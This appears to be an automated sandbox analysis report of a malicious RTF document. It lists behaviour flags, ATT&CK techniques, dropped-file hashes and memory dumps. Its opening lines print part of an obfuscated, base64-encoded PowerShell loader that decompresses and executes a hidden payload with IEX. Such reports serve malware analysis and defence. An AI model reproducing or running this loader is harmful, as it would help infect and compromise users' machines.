TwB0AEsANQByAG0AUQBOACsAYwBkAC8AZwBoACsARABYADUAMgBRAFoAWQByAEQAdQB4AGIAbQBIAEcAdQBQAGgAVgBEAG4AYQBqAGUANwBJAHoAaQBMAEoAbABiAEwAeABzAE8AVwBDADcAVABhAFIARwA3AEQAUABDADEAaQBmAGUAQQBzAE4AawBLAHEAOAB4AGkAcgBDAG0AbABFAE4ATwBuAHoAawB6AGYAdQBoAG8AVABJAEQAawAxAE8AVwBiAFMAcwBMAEcAVQA3AHoANQBvAGQAMgBBADUAawBwAHcANABlAEwARwA4ADMATwA3AHUANAA3AHoAVQA2AC8ALwBZAGcAMQA5ADIAaQAyAG0AKwBPADAAKwA3AEEAVABRADYAZQBQAHAANAByAFQANwBqAFAAYgBUAGMAZQBjAGUAVwByAEwAUwBjAGEAeQB4ADIAbQBaADQAcQBwAEMAdAAyAGMAeQA5AG8ASgBsAG4ATgA2AFUAcwBXAFcAZABjAFIANgBOAHQATQBPAFoAagBEAEwAVwB2AFMANAAzAG8AVQBQAFoAVQBBAC8ATAAwAC8ANQBtAGEAWABqAHQAcwBZAG8AVgBBAC8AQwB3AEsAbgBhAEcAaABrAEQATABVAC8AcAArADMAQgBNAGwASgBLAFMAMAB4AGEAZQBlAHoARwBrAGIAdgBiACsAUgBsAFYANwBXAEQATwBkAGUAbAA5AFcAdwBNAHUATwAzAEgAYwA0AHcAdABhAG4AcQBhAGIAMgBlAHEAdgBRAE0AOQBmADcATwBaAGoAcwA5ADQAeQB3AHIAdQBzADMAUQBOAGgAZQBpAGgAcwBXAGUAcQBYAGsAOAArAEoAdQBaAEIAMAAvAG0AaABhADYAcwAwAFgATgBGAG4AdwB5AG0AYwBHAGIAeABaAGwAYwAyADEAbQBrAHkAbgBBADUAWQBWAFYAZwBZAGsALwBSACsAYQA1AGkANQBUAEsAaABvAFgAWQAvAFgAUgBEAHcAMAAwAHoAYQB2ADAAUQB2AFIAbwBBAGMAegBEAGUAdwA2AEcARwBKAFUANwAxADEATgBXAEMAaQBUAGcAOABjAHYAdgBjAE4AQwA5AHoAcABqAGQAWgAxAE8AZQBVADMAbQB1AFkAWQAyAE4ARQB4AEgAbgBvAGcAcwB2ADUAegBaAHYASwBqAFMAYQBvADkAVgBHAHEAWQBaADkAagBXAFAAbQBmAEYAZABWAFIARQBPAGEAOQA2AGMAbQBBAHQAaABJAHkAbABDAEcAdgBBAFEAdgA2AFMAdABGAFUALwB6AHUAcABMAEIATgBVAFAAcABrADkAeABvAFEANQBLAE4ANwBmADcARQBkACsAZABlAHIAQQBWADMAaQBJADUAMABzAGIAMABhAE4AdQBuADEAagBTAGwAMgBoAHAAMABOAE8ANQBkAHAANgBZAGIAUgByAEcANwB2ADQAVABqAFgARgBHADkAbgBhAEMAUABFADMARAB4AHMANgBNAHgAbQBVAEwASgBSAGIAbQB6ADcAVgBlADgAOABUAHQAYwB6AHkARQBVAFAAdgAwAEkAZQBIAHkARwBuAFIALwBCADcAbABSAG8AZwAzAEgAVABTAEEAKwBSAFkAUABOAGoASgBJAHcANwBxAFoAUgA5AG0AOQBqAEEAUwBIAEMARgArAFoAYQBGAEcAdwBQADEASQBYAGsANQAzAHEAWABPADgAQwB4AE4AbABkAG0AKwB0AFAAUwBuAGgAbwBNAGEAWABQAFgAVABEAGoAMwBiAGsAdwBXADQASQBFADkAawAwAEYANABvAHAAaABLAHoASgBNAG8ATwBKAGMATgBCADAAbAB0AEUAbQByAHIAegA0AFoAQwBaADYAMwBzAE4AVwBRAFEAUgBUAHkAZgBHAFkAdgArAHIALwBSAGUAVwBMAFcAMAB5AG8AYwA1ACsAQwA3AGcAUgB0AHIAOQBpACsAdQBhAG4AbQA0ADgATAA1ADQAQQBsADIAbgBvAHYAcAA3AHQAMwBqADcAZgBJAEEAeABoAHIAMwBlAGMATQByAFcAdQBMAGUAZQB0AGYAbwBmAGoAYwB4AHkAVgBZAFUAYgB5AHcATQBEAFIAQwBtAG4AcwBzADcAUwB3AHcAaQA4AFQAeQA3AGoAQQBNADMAMQA2AGgAVQBQAGgANgAzAFAAUgBUADUAQwBNAE0AbwBDAHMAUABxAHAAZABPAHoARwBBAGQAMgBQAG0AMwA5AFoAdQB5AEIAMgBlADgAMABrAFQAMwBEAEcAOAAyAEUAWgBlAFAAdQB3ADEAVwBWAGUAaABPAEUARQBlAHMAVQAwAHoASgBaAHIAWQBxAEoANQBCAHoAaABaAFQAQwA3AEMASAA3ACsAdgBJAEQAdwBhAG0AOABNAGoAcABDAC8ASgBwAHMAYQBSAFIAOABhAE4ARQAzAG4ALwA1AHQAMAB0AGYAVABuAHAASABCAEIAbQBGAFgATwB4AG0AcgA1AE4AUABZAE8AeABRADgAdgB1AFAAQgBTAFAAZgBNAGUASgBmADQAVwAvAFIAKwBwAC8AOABuAGwAZgB5AGMAMQBwADYAMABZADUAOQA1AEkASwB3AEIAOQB6AEYAUwAxAFYAUAA1AGEASwBrAGsAcgA2AHQAMQArADcAQgA3AGgAWQB3AFgAdABxAEgAYQBSAGMAegBHAHgASQBuAEwANwBHAGkAegBoAHkANgBaADQAVgBWAGUAdQByAFMAbwBsAEMAVABQAHEAMgBxAEsAKwBVADcAYwBRAEgAaABzADMANwB1AEQAegBKAGwAbwBuACsAWAB1AGIAKwB2AEgARgA5AG8AMQBLAEwAZgBlAGsALwBJADMAUwBrAEkAMQBnADQAcgA0AGQAQgBFAHYASQBVAFEAUQBqAFcARwA2ACsATQBIAFIAUgBnAFAAMQAvAEEATAB6ADIAVAB3ADQASwBEAGcAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
b9247e79cc7c4cf6da45edb95662cd72

SHA1
b4fe0dfa91959f2667051bdba9fbe23b74ed4e41

SHA256
8ec73bea3222263ef60f7a5cd3314cb680a2184903c2c20225d6b627eb3a7154

SHA512
a40f7351bcb9b514eb6d72913a6b57ae93ea24c116843d9d8e7e855613f47000c241aac6f4ade915032c2cdaf69200030d410873f24556932c775ab8b297fa34

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize
242B

MD5
5d03faadb921a0d6befc20ebe1116b18

SHA1
f8fdd6ee8fb8fd13e357500e5a0a20b5d542ff5d

SHA256
d363655255b62d07170812b011ffcf625aab1b9930cb2b37fe9950593e4e7a04

SHA512
f382ecd8ea0aa01d892078e66c23f93c767f7dc2bd3caa685ce6a4a696f1224b57f7da9d07bdbaf9aa941ff012d88fcadbb21f7d49fca1f571c1722b6e2cefc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{BC76F8BB-CFFD-4488-9523-D0D899FDA015}.FSD
Filesize
128KB

MD5
f828bbdb9db64ceaed26f58e7cc4a3de

SHA1
e32665ce5a1c94125538ee88c1a700305faa710a

SHA256
b88503a6a45dbc5a9af4e707a424f1ddcba30090b00de25a3a17a6e36bf6a3ca

SHA512
feb9174e88d30e7c839d45c1b6f26cf695a3a0210f0fa23eed3955c0c0bdf7a23dfb09a1785ba3a444dc80c3ba7e7e873b0065e306b442707f7bc7406686ad7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize
128KB

MD5
375ae080c1b0c4cbd09b0c4dc0edd476

SHA1
3f5ace410a5dc65f38ce268a3f716ca91db0b2db

SHA256
25f96f281b2c06574f1f122f207ca80121ef0ee55b8b5bf89e1975a1eb9aa76b

SHA512
9953314bb43d4a3440a57b68f090d8db96e7164e060a29ca48811e67181016a65cdc648b6ea58a50521f1246b9e7e4fc5f208f5e7c540d3185b776c1ad0d5297

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7E53F0AD-741F-45AD-A810-DE5F14ECD983}.FSD
Filesize
128KB

MD5
9d1e63e2c6a71280905fe9144260f442

SHA1
0d12887273902ca7c3758dab7e8597a51044cd51

SHA256
dc373dd0dbec982605ef372f82bb8f7710b55505706d8d2bbd053d179cb59efa

SHA512
bab50606009ce24f746e722b98310380fd4518a013ae0b0bad1999eccd921e731cc5279c3ae7532da8a71418d9e931ba07a6821da3e63ea050e13c05ec2a3efc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EDQW9R5V\openai[1].rtf
Filesize
768KB

MD5
2e8a01026b5c298a9b1d2519241f0b16

SHA1
98b44cc10887c7cb63a769cbd258c45720eb7ef7

SHA256
0473ee221e38ba27330654ffb3cdd6476ff530881c303cc20d2efdff0c270e61

SHA512
aeaf88341f33a2f130730cd4871abbf9ae48a3932bab7a21d6376c7579bbe8dad7f226694134db5f0b19b2d9a3248c66e9c3f2adc21d432573f9624c4452451b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab561C.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar65CC.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\{E9E8DC99-9267-4E4B-AD7B-3EEB8B508610}
Filesize
128KB

MD5
2170e3c8d4d4e52100d76bf5d24aa0ff

SHA1
2e12ff630ff1a43c9423c80457d2ba5b0e26b024

SHA256
419c8de76f72e1462480ec5c4582678eb042cc699e5e6b1c16af2d0992d2e1b5

SHA512
99e1548cbe07e9f74458a31f5d8131cfb18dcbdcf20daf8e44e13cc63c192aa6dc25797c8b4b0790a1cc123987dcf2432fc171546ad9e90945131a77069d8ea7

Download Submit
memory/2844-113-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/2844-135-0x0000000006050000-0x0000000006096000-memory.dmp

Filesize
280KB

Download
memory/2844-114-0x0000000002BD0000-0x0000000002BD1000-memory.dmp

Filesize
4KB

Download
memory/2844-112-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/2844-111-0x0000000068620000-0x0000000068BCB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-157-0x0000000006050000-0x0000000006096000-memory.dmp

Filesize
280KB

Download
memory/2844-134-0x0000000006CE0000-0x00000000070E0000-memory.dmp

Filesize
4.0MB

Download
memory/2844-156-0x0000000068620000-0x0000000068BCB000-memory.dmp

Filesize
5.7MB

Download
memory/2844-110-0x0000000002860000-0x00000000028A0000-memory.dmp

Filesize
256KB

Download
memory/2844-109-0x0000000068620000-0x0000000068BCB000-memory.dmp

Filesize
5.7MB

Download
memory/2952-0-0x000000002F251000-0x000000002F252000-memory.dmp

Filesize
4KB

Download
memory/2952-133-0x000000007189D000-0x00000000718A8000-memory.dmp

Filesize
44KB

Download
memory/2952-2-0x000000007189D000-0x00000000718A8000-memory.dmp

Filesize
44KB

Download
memory/2952-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download